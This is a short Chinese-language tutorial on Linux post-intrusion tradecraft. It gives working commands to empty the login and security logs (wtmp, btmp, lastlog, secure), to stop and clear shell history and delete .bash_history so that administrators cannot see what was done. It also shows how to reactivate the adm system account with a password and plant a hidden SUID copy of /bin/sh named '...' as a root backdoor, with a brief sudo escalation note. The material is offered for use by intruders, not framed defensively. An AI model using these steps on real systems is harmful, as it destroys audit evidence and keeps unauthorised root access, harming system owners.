linux清理入侵日志和维持权限

清除日志

1、清除登录ssh登录日志、安全日志、last、lastb等

cat /dev/null > /var/log/wtmp
cat /dev/null > /var/log/btmp
cat /dev/null > /var/log/lastlog
cat /dev/null > /var/log/secure

2、history删除

set +o history (最前面有空格)

输入该命令后，在当前终端，之后输入的所有命令都不会被history记录（防止搞到一半被管理员断网，记录留下）

history -c

输入该命令之后，当前终端所有输过的命令不会被记录到history（一般这>个就够了）

rm -rf ~/.bash_history

删除history，意思之前管理员记录的history也没了，有的管理员有查看history的习惯，这条慎用

linux suid提权

前提：以root权限激活用户，并创建suid提权的后门
激活adm用户（linux自带很多无用用户，如adm）
usermod -s /bin/bash adm
echo "password"|passwd --stdin adm
suid提权，把sh复制重命名为...，放在其他文件夹，加s权限，重命名为...是为了不被发现,ls看不到，ls -la一般人也看不出
cp /bin/sh /usr/share/...
chmod a+s /usr/share/...
使用时以adm ssh登录，然后输入以下命令就是root权限了
./usr/share/... -p
经测试3.10.0可以完全root权限，有些版本权限会有问题

linux sudo提权

前提：linux /etc/sudoers文件有添加你普通用户的账号

在以普通用户test执行sudo bash
输入test用户的密码
同理sudo vim sudo sh也是可以的